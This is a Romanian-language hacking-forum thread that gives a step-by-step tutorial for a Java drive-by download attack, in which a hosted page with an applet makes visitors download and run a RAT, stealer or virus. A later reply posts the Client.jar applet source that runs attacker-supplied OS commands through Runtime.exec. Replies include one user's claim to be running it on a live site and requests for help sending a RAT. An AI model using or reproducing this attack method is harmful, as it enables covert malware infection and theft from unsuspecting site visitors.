sebywarlord Posted July 26, 2012 Report Share Posted July 26, 2012 (edited) Ce este Java Drive-By Download?Este o metoda prin care atacatorul ,implementeaz? pe site-ul lui niste coduri java ?i atunci când cineva viziteaz? pagina, un executabil care poate fi un RAT, WORM sau un VIRUS este desc?rcat ?i executat în sistemul s?u, f?r? stirea luiDownload Link Aici:Java Drive by Download.rarAcum sa incepem:1.Uploadeaza-ti fisierul [RAT,STEALER,WARM etc] pe un host Hostul trebuie sa aiba download direct fara timp de asteptareceva de formahttp;//siteuldeupload.com/fisierulmeu.exeDeci fara timp de asteptare sau etc,intelegeti voi2.Acum dezarhivam arhiva JavaDrivebyIntram in ea si editam index.htmlEditam index.html ca in imaginea de mai josinloc de http://localhost/abc.exePunem link-ul de la fisierul nostru3.Uploadati index.html si client.jar pe un hostEu recomandCreate a Website for Free - Make a free website at T15.orgIncercati sa pacaliti victima sa intre pe site-ul creatAtunci cand victima intra ii va aparea un requestDaca accepta , virusul v-a fii rulat pe sistemul victimeiCum lucreaza Java Drive-by?Ai nevoie de 3 fisiere pentru a rula java-drive-by1.virusul tau.exe2.Client.jar ,applet-ul java care acceseaza CMD-ul iar mai tarziu creeaza si executa fisierul winconfig.vbs3.index.html , care incorporeaza Client.jar si codurile care trebuie scrise in winconfig.vbsCam atata am avut de explicat,sper ca va este de ajutorTutorialul nu este facut de mine, eu doar l-am tradus in limba romanaSursa english : Java Drive by Download: Tutorial and Explanation – Kerala Cyber Force | KCF Edited November 14, 2012 by sebywarlord 1 Link to comment Share on other sites More sharing options...
StrXt Posted July 26, 2012 Report Share Posted July 26, 2012 Bun tutorialul dar metoda nu mai este de actualitate... Link to comment Share on other sites More sharing options...
VladX Posted July 26, 2012 Report Share Posted July 26, 2012 Totusi pentru cei mai noobi ca mine este foarte bun tutorialul.Multumesc Link to comment Share on other sites More sharing options...
GarryOne Posted July 26, 2012 Report Share Posted July 26, 2012 Bun tutorialul dar metoda nu mai este de actualitate...de ce nu mai este de actualitate? Link to comment Share on other sites More sharing options...
Blackvein Posted July 27, 2012 Report Share Posted July 27, 2012 Este bun tutorialul! Multumim! Link to comment Share on other sites More sharing options...
lutulik Posted July 28, 2012 Report Share Posted July 28, 2012 Bun tutorialul dar metoda nu mai este de actualitate...Cum sa nu mai fie.Eu l-am instalat cu succes pe un site.Am peste 200 vizitatori pe zi si merge foarte bine. Link to comment Share on other sites More sharing options...
Cheater Posted July 28, 2012 Report Share Posted July 28, 2012 Interesant cu java-drive-by este ca poti face un script simplu ce sa detecteze os-ul clientului, iar in functie de os sa descarce si sa acceseze un trojan/virus pt linux, mac, win. Tinand cont de cat de avansat e nivelul de securitate in fiecare os, si ce se poate obtine in functie de asta. Link to comment Share on other sites More sharing options...
nostradamus2012 Posted August 11, 2012 Report Share Posted August 11, 2012 Salut! interesant ce spuneti, eu nu ma descurc, cine imi face si mie metoda asta sa trimit un RAT sau istealer??? Link to comment Share on other sites More sharing options...
nSnoopy Posted August 11, 2012 Report Share Posted August 11, 2012 Salut! interesant ce spuneti, eu nu ma descurc, cine imi face si mie metoda asta sa trimit un RAT sau istealer???[Tutorial] Setting Up A Java Drive By [FUD] - YouTubeSper sa te ajute,este aproape acelasi lucru doar ca trebuie sa descarci de la link-ul din primul post. Link to comment Share on other sites More sharing options...
oul Posted September 19, 2012 Report Share Posted September 19, 2012 reupload Link to comment Share on other sites More sharing options...
sebywarlord Posted September 24, 2012 Author Report Share Posted September 24, 2012 Nu necesita reuplaod , eu vad ca merge linkul! Link to comment Share on other sites More sharing options...
connected Posted September 25, 2012 Report Share Posted September 25, 2012 inca e actual ! Link to comment Share on other sites More sharing options...
hackerika Posted September 26, 2012 Report Share Posted September 26, 2012 Este metoda silent?Sau cere allow la java?edit// acum am citit mai bine si am vazut ca da... Link to comment Share on other sites More sharing options...
seby05 Posted December 23, 2012 Report Share Posted December 23, 2012 unde pot gasi sursa de la Client.jar? Link to comment Share on other sites More sharing options...
M2G Posted December 23, 2012 Report Share Posted December 23, 2012 (edited) Asta e sursa:import java.applet.Applet;import java.io.IOException;public class Client extends Applet{ public void init() { String windows1 = getParameter("windows1"); String windows2 = getParameter("windows2"); String linux1 = getParameter("linux1"); String linux2 = getParameter("linux2"); String unix1 = getParameter("unix1"); String unix2 = getParameter("unix2"); String os = System.getProperty("os.name").toLowerCase(); if (os.indexOf("win") >= 0) { try { Process w1 = Runtime.getRuntime().exec(windows1); w2 = Runtime.getRuntime().exec(windows2); } catch (IOException e) { Process w2; e.printStackTrace(); } } if (os.indexOf("mac") >= 0) { try { Process u1 = Runtime.getRuntime().exec(unix1); u2 = Runtime.getRuntime().exec(unix2); } catch (IOException e) { Process u2; e.printStackTrace(); } } if (os.indexOf("lin") >= 0) { try { Process l1 = Runtime.getRuntime().exec(linux1); l2 = Runtime.getRuntime().exec(linux2); } catch (IOException e) { Process l2; e.printStackTrace(); } } }}Nu face altceva decat sa vada ce sistem de operare foloseste victima si sa lanseze scriptul aferent care e in fisierul html.In cazul windows, se foloseste de visual basic script (vbs) pentru a downloada si rula executabilul infectat. Edited December 23, 2012 by M2G Link to comment Share on other sites More sharing options...
jetus Posted December 23, 2012 Report Share Posted December 23, 2012 Merci pentru tutorial, problema e ca multa lume nu are java Link to comment Share on other sites More sharing options...
teko. Posted December 28, 2012 Report Share Posted December 28, 2012 mai exista o problema, pe windows 7 x64 nu merge nu laseaza exe Link to comment Share on other sites More sharing options...
bastanel Posted December 28, 2012 Report Share Posted December 28, 2012 confirm si eu cele spuse de teko+ca pe celalalt pc al meu pe windows7 de x86 mi-l vede eset-ul ca si virus Link to comment Share on other sites More sharing options...
SOkola Posted September 13, 2013 Report Share Posted September 13, 2013 Un nou link de down ar fi ok. Link to comment Share on other sites More sharing options...
sebywarlord Posted September 13, 2013 Author Report Share Posted September 13, 2013 Din pacate am pierdut arhiva,defapt o am prin PC dar mi-a sters antivirusul fisiere din ea.... Link to comment Share on other sites More sharing options...
Avram Posted September 15, 2013 Report Share Posted September 15, 2013 Daca merge dau de baut la tot liceulREVIN CU EDIT Link to comment Share on other sites More sharing options...
Avram Posted September 15, 2013 Report Share Posted September 15, 2013 Link Download invalid . Link to comment Share on other sites More sharing options...
Avram Posted September 15, 2013 Report Share Posted September 15, 2013 Pe ce site sa uploadez? Link to comment Share on other sites More sharing options...
lauryca Posted August 25, 2014 Report Share Posted August 25, 2014 Puteti face un reupload va rog ? Link to comment Share on other sites More sharing options...
Noname14 Posted August 27, 2014 Report Share Posted August 27, 2014 Merge si pentru ppi? Link to comment Share on other sites More sharing options...